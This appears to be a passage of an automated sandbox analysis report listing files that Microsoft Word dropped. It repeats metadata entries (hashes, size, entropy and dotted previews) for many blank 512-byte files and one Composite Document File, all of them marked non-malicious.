                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):420352
                            Entropy (8bit):5.195733687121544
                            Encrypted:false
                            SSDEEP:6144:QlU08wTtMm1aGAYCdyIanhFobjmEU2GgFpAMe74slRl1PQxVvIRuj8:QW08+6aziFpAMe74slRl1YNIRuj8
                            MD5:7C5C64E3582B07DCA2FFF0356C9A2889
                            SHA1:3E7DFC2547DD1454B7EA9278C976AB8D093AAA38
                            SHA-256:72066ED0B696EC25AC32E0DAC822A1490A70EA29E76D399562CBC9BED9726F16
                            SHA-512:13C1161603C49B9491F6718B5E15D893EBC929344785805D012FD3AC8EE0E09F51A2E43E6F82925A68F1E2C37E76322DCCA4A6AF56744525722F0672BA77F685
                            Malicious:false
                            Preview:......................>.......................................................B...............{......................................................................................................................................................................................................................................................................................................................................................................................................................................./.......C........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...........D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
